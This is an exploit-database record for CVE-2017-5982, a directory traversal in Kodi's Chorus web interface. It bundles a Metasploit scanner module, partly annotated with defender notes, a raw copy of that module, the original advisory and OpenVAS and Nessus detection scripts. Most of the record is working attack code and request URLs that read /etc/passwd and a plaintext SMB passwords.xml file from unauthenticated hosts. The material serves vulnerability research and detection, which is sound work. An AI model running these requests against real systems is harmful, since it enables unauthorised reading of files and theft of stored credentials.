ID 1337DAY-ID-27301 Type zdt Reporter metasploit Modified 2017-03-13T00:00:00
Description
Usage Info
msf > use auxiliary/scanner/http/kodi_traversal
msf auxiliary(kodi_traversal) > show actions
...actions...
msf auxiliary(kodi_traversal) > set ACTION <action-name>
msf auxiliary(kodi_traversal) > show options
...show and set options...
msf auxiliary(kodi_traversal) > run
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Auxiliary scanner module for CVE-2017-5982: a directory traversal in the
# image handler of Kodi's web interface that lets an unauthenticated client
# read files from the host.
#
# Reviewer notes for defenders:
# * Request shape: a single GET below TARGETURI whose path is the string
#   "image/image://" plus a "../" run and the file name, percent-encoded
#   twice. Web-server and proxy logs can be searched for requests under
#   /image/ that carry encoded "image://" and dot-dot sequences.
# * Success is decided on the HTTP status alone; the body is never compared
#   with the expected file, so a server answering 200 with other content is
#   reported as readable. Confirm findings by inspecting the stored body.
# * NOTE(review): 'Description' says "before 17.1", while the original
#   advisory (Eric Flokstra, 12 Feb 2017) lists Kodi 17.1 with Chorus 2.4.2
#   as the tested version and the vendor fix is reported for Kodi 17.2.
#   Treat 17.1 as affected until verified.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and its three options.
  #
  # @param info [Hash] metadata supplied by the framework, merged through
  #   update_info with the values declared here
  def initialize(info = {})
    module_info = {
      'Name' => 'Kodi 17.0 Local File Inclusion Vulnerability',
      'Description' => %q{
        This module exploits a directory traversal flaw found in Kodi before 17.1.
      },
      'References' => [
        ['CVE', '2017-5982'],
      ],
      'Author' => [
        'Eric Flokstra', #Original
        'jvoisin'
      ],
      'License' => MSF_LICENSE,
      'DisclosureDate' => "Feb 12 2017"
    }
    super(update_info(info, module_info))

    module_options = [
      OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
      OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']),
      OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10])
    ]
    register_options(module_options, self.class)
  end

  # Requests the configured FILE from one host and, on HTTP 200, stores the
  # response body as loot.
  #
  # @param ip [String] address of the host currently being scanned
  def run_host(ip)
    base = normalize_uri(target_uri.path)

    # Built but never read in this method; kept so the rport lookup still runs.
    _peer = "#{ip}:#{rport}"

    requested = datastore['FILE']
    print_status("Reading '#{requested}'")

    dot_dots = '../' * datastore['DEPTH']
    # Drop one leading character when the pattern matches, so the traversal
    # prefix and the file name join with a single slash.
    relative = requested =~ /^\// ? requested[1, requested.length] : requested

    # The traversal + file name is encoded once on its own, then the whole
    # "image/image://..." string is encoded again before it is joined to base.
    inner = Rex::Text.uri_encode(dot_dots + relative, "hex-all")
    image_path = "image/image://" + inner
    uri = normalize_uri(base, Rex::Text.uri_encode(image_path, "hex-all"))

    res = send_request_cgi({ 'method' => 'GET', 'uri' => uri })
    status = res && res.code

    if status == 200
      # Only the status code is checked; the body is saved as received
      # (leading whitespace stripped), whatever it contains.
      body = res.body.lstrip
      loot_path = store_loot('kodi', 'application/octet-stream', ip, body, requested)

      vprint_line(body)
      print_good("#{requested} stored as '#{loot_path}'")
    elsif res
      print_error("Unable to read '#{requested}', possibily because:")
      print_error("\t1. File does not exist.")
      print_error("\t2. No permission.")
    else
      # No response object came back from send_request_cgi.
      print_error('Fail to obtain file for some unknown reason')
    end
  end
end
# 0day.today [2018-03-17] #
{"href": "https://0day.today/exploit/description/27301", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Auxiliary::Report\r\n include Msf::Auxiliary::Scanner\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Kodi 17.0 Local File Inclusion Vulnerability',\r\n 'Description' => %q{\r\n This module exploits a directory traversal flaw found in Kodi before 17.1.\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', '2017-5982'],\r\n ],\r\n 'Author' =>\r\n [\r\n 'Eric Flokstra', #Original\r\n 'jvoisin'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'DisclosureDate' => \"Feb 12 2017\"\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),\r\n OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']),\r\n OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10])\r\n ], self.class)\r\n end\r\n\r\n\r\n def run_host(ip)\r\n base = normalize_uri(target_uri.path)\r\n\r\n peer = \"#{ip}:#{rport}\"\r\n\r\n print_status(\"Reading '#{datastore['FILE']}'\")\r\n\r\n traverse = '../' * datastore['DEPTH']\r\n f = datastore['FILE']\r\n f = f[1, f.length] if f =~ /^\\//\r\n f = \"image/image://\" + Rex::Text.uri_encode(traverse + f, \"hex-all\")\r\n\r\n uri = normalize_uri(base, Rex::Text.uri_encode(f, \"hex-all\"))\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri\r\n })\r\n\r\n if res and res.code != 200\r\n print_error(\"Unable to read '#{datastore['FILE']}', possibily because:\")\r\n print_error(\"\\t1. File does not exist.\")\r\n print_error(\"\\t2. 
No permission.\")\r\n\r\n elsif res and res.code == 200\r\n data = res.body.lstrip\r\n fname = datastore['FILE']\r\n p = store_loot(\r\n 'kodi',\r\n 'application/octet-stream',\r\n ip,\r\n data,\r\n fname\r\n )\r\n\r\n vprint_line(data)\r\n print_good(\"#{fname} stored as '#{p}'\")\r\n\r\n else\r\n print_error('Fail to obtain file for some unknown reason')\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-17] #", "bulletinFamily": "exploit", "modified": "2017-03-13T00:00:00", "title": "Kodi 17.0 Local File Inclusion Exploit", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/", "score": 5.0}, "sourceHref": "https://0day.today/exploit/27301", "cvelist": ["CVE-2017-5982"], "description": "\n\n#### Usage Info\nmsf > use auxiliary/scanner/http/kodi_traversal\rmsf auxiliary(kodi_traversal) > show actions\r...actions...\rmsf auxiliary(kodi_traversal) > set ACTION <action-name>\rmsf auxiliary(kodi_traversal) > show options\r...show and set options...\rmsf auxiliary(kodi_traversal) > run", "viewCount": 13, "published": "2017-03-13T00:00:00", "edition": 1, "id": "1337DAY-ID-27301", "type": "zdt", "lastseen": "2018-03-17T03:15:03", "reporter": "metasploit", "enchantments": {"score": {"value": 5.2, "vector": "NONE", "modified": "2018-03-17T03:15:03", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-5982"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141103"]}, {"type": "nessus", "idList": ["KODI_LOCAL_FILE_INCLUSION.NASL"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/KODI_TRAVERSAL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106586"]}], "modified": "2018-03-17T03:15:03", "rev": 2}, "vulnersScore": 5.2}, "references": [], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:36:48", "description": "Directory traversal vulnerability in the Chorus2 2.4.2 add-on for Kodi allows remote attackers to read arbitrary files via a %2E%2E%252e (encoded dot dot slash) in the image path, as demonstrated by image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-02-28T18:59:00", "title": "CVE-2017-5982", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5982"], "modified": "2017-03-03T02:59:00", "cpe": ["cpe:/a:kodi:kodi:17.1"], "id": "CVE-2017-5982", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5982", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2017-02-15T15:04:46", "description": "", "published": "2017-02-15T00:00:00", "type": "packetstorm", "title": "Kodi 17.1 Local File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5982"], "modified": "2017-02-15T00:00:00", "id": "PACKETSTORM:141103", "href": 
"https://packetstormsecurity.com/files/141103/Kodi-17.1-Local-File-Inclusion.html", "sourceData": "`# Exploit Title: Kodi - Local File Inclusion \n# Date: 12 February 2017 \n# Exploit Author: Eric Flokstra \n# Vendor Homepage: https://kodi.tv/ \n# Software Link: https://kodi.tv/download/ \n# Version: Kodi version 17.1 (Krypton), Chorus version 2.4.2 \n# Tested on: Linux \n# CVE: CVE-2017-5982 \n \nKodi (formerly XBMC) is a free and open-source media player software \napplication developed by the XBMC Foundation. Chorus is a web interface \nfor controlling and interacting with Kodi. It is hosted by the Kodi \ninstallation. \n \nThe web interface loads a thumbnail of an image, video or add-on when \nselecting a category in the left menu with the following request: \n \nhttp://192.168.1.25:8080/image/image%3A%2F%2F%252fhome%252fosmc%252f.kodi%252faddons%252fplugin.video.vice%252ficon.png%2F \n \nInsufficient validation of user input is performed on this URL resulting \nin a local file inclusion vulnerability. This enables attackers \nto retrieve arbitrary files from the filesystem by changing the location \nafter the '/image/image%3A%2F%2Fa part. 
\n \n<--Examples--> \n \n1) If Kodi is connected to a NAS the following request can be used to \nobtain plain-text SMB credentials: \n \nhttp://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml \n \nResponse: \n \n<passwords><path><from pathversion=\"1\">smb://192.168.1.15/</from><to \npathversion=\"1\">smb://username:password@192.168.1.15//share</to></path></passwords> \n \n2) Request to retrieve the content of /etc/passwd: \n \nhttp://192.168.1.25:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd \n \nResponse: \n \nroot:x:0:0:root:/root:/bin/bash \ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin \nbin:x:2:2:bin:/bin:/usr/sbin/nologin \nsys:x:3:3:sys:/dev:/usr/sbin/nologin \nsync:x:4:65534:sync:/bin:/bin/sync \ngames:x:5:60:games:/usr/games:/usr/sbin/nologin \nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin \nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin \nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin \nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin \nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin \nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin \nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin \n... 
\n \n-- \n--------------------------------------------------------------------- \nPGP Key ID = 0x6D336541EAB627EE \nFingerprint = DFBB E38E D848 4658 EC4C D161 6D33 6541 EAB6 27EE \nhttps://pgp.mit.edu/pks/lookup?search=erp.flokstra@gmail.com&op=index \n--------------------------------------------------------------------- \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141103/kodi171-lfi.txt"}], "openvas": [{"lastseen": "2020-05-12T17:20:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5982"], "description": "Kodi is prone to an arbitrary file disclosure vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2017-02-13T00:00:00", "id": "OPENVAS:1361412562310106586", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106586", "type": "openvas", "title": "Kodi Local File Inclusion Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Kodi Local File Inclusion Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:kodi:kodi\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106586\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-02-13 10:37:26 +0700 (Mon, 13 Feb 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_cve_id(\"CVE-2017-5982\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Kodi Local File Inclusion Vulnerability\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_kodi_web_server_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"Kodi/WebServer/installed\");\n\n script_tag(name:\"summary\", value:\"Kodi is prone to an arbitrary file disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Tries to read a system file.\");\n\n script_tag(name:\"insight\", value:\"The web interface loads a thumbnail of an image, video or add-on when\nselecting a category in the left menu. Insufficient validation of user input is performed on this URL resulting\nin a local file inclusion vulnerability.\");\n\n script_tag(name:\"impact\", value:\"A unauthenticated attacker may read arbitrary files from the file system.\");\n\n script_tag(name:\"solution\", value:\"Update to Kodi version 17.2 or later. 
For details please see the references.\");\n\n script_xref(name:\"URL\", value:\"https://kodi.tv/article/kodi-v172-minor-bug-fix-and-security-release\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/41312/\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nfiles = traversal_files();\n\nforeach file (keys(files)) {\n url = dir + '/image/image%3A%2F%2F%2e%2e%252f' + str_replace(string: files[file], find: \"/\", replace: \"%252f\");\n\n if (http_vuln_check(port: port, url: url, pattern: file, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url);\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-04-01T03:34:59", "description": "The Kodi media player server running on the remote host is affected by\nan information disclosure vulnerability in the Chorus web interface\ndue to improper validation of user-supplied input to the /image/\nscript, specifically when path traversal is employed (e.g., %2F) in\nthe URL. 
An unauthenticated, remote attacker can exploit this issue,\nvia a specially crafted URL, to cause the inclusion of local files,\nresulting in the disclosure of arbitrary files.", "edition": 30, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-03-22T00:00:00", "title": "Kodi Local File Inclusion Information Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5982"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:kodi:kodi"], "id": "KODI_LOCAL_FILE_INCLUSION.NASL", "href": "https://www.tenable.com/plugins/nessus/97894", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97894);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/15 20:50:17\");\n\n script_cve_id(\"CVE-2017-5982\");\n script_bugtraq_id(96481);\n script_xref(name:\"EDB-ID\", value:\"41312\");\n\n script_name(english:\"Kodi Local File Inclusion Information Disclosure\");\n script_summary(english:\"Accesses a restricted file on the server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A media player server running on the remote host is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Kodi media player server running on the remote host is affected by\nan information disclosure vulnerability in the Chorus web interface\ndue to improper validation of user-supplied input to the /image/\nscript, specifically when path traversal is employed (e.g., %2F) in\nthe URL. 
An unauthenticated, remote attacker can exploit this issue,\nvia a specially crafted URL, to cause the inclusion of local files,\nresulting in the disclosure of arbitrary files.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.exploit-db.com/exploits/41312/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2017/Feb/27\");\n script_set_attribute(attribute:\"solution\", value:\n\"No solution was available at this time. Contact the vendor for a fix\nor workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:kodi:kodi\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"kodi_detect.nbin\");\n script_require_ports(\"Services/www\", 8080);\n script_require_keys(\"installed_sw/Kodi\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\ninclude(\"webapp_func.inc\");\n\nappname = \"Kodi\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\nport = get_http_port(default:8080);\ninstall = get_single_install(app_name:appname, port:port);\n\nrequest = \"/image/image%3a%2f%2f%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65\" +\n \"%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65\" +\n \"%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65\" +\n \"%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66\" +\n \"%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34\";\n\nres = http_send_recv3(item:request, port:port, method:\"GET\", exit_on_fail:TRUE);\nif (\"200\" >!< res[0] || \"root:\" >!< res[2])\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname, install[\"version\"]);\n}\n\nsecurity_report_v4(\n port:port,\n file:'/etc/passwd',\n request:make_list(build_url(port:port, qs:request)),\n output:res[2],\n severity:SECURITY_WARNING);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2020-10-09T20:03:14", "description": "This module exploits a directory traversal flaw found in Kodi before 17.1.\n", "published": "2017-02-19T20:57:27", "type": "metasploit", "title": "Kodi 17.0 Local File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5982"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/SCANNER/HTTP/KODI_TRAVERSAL", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass 
MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Kodi 17.0 Local File Inclusion Vulnerability',\n 'Description' => %q{\n This module exploits a directory traversal flaw found in Kodi before 17.1.\n },\n 'References' =>\n [\n ['CVE', '2017-5982'],\n ],\n 'Author' =>\n [\n 'Eric Flokstra', #Original\n 'jvoisin'\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2017-02-12'\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),\n OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']),\n OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10])\n ])\n end\n\n\n def run_host(ip)\n base = normalize_uri(target_uri.path)\n\n peer = \"#{ip}:#{rport}\"\n\n print_status(\"Reading '#{datastore['FILE']}'\")\n\n traverse = '../' * datastore['DEPTH']\n f = datastore['FILE']\n f = f[1, f.length] if f =~ /^\\//\n f = \"image/image://\" + Rex::Text.uri_encode(traverse + f, \"hex-all\")\n\n uri = normalize_uri(base, Rex::Text.uri_encode(f, \"hex-all\"))\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri\n })\n\n if res and res.code != 200\n print_error(\"Unable to read '#{datastore['FILE']}', possibily because:\")\n print_error(\"\\t1. File does not exist.\")\n print_error(\"\\t2. No permission.\")\n\n elsif res and res.code == 200\n data = res.body.lstrip\n fname = datastore['FILE']\n p = store_loot(\n 'kodi',\n 'application/octet-stream',\n ip,\n data,\n fname\n )\n\n vprint_line(data)\n print_good(\"#{fname} stored as '#{p}'\")\n\n else\n print_error('Fail to obtain file for some unknown reason')\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/kodi_traversal.rb"}]}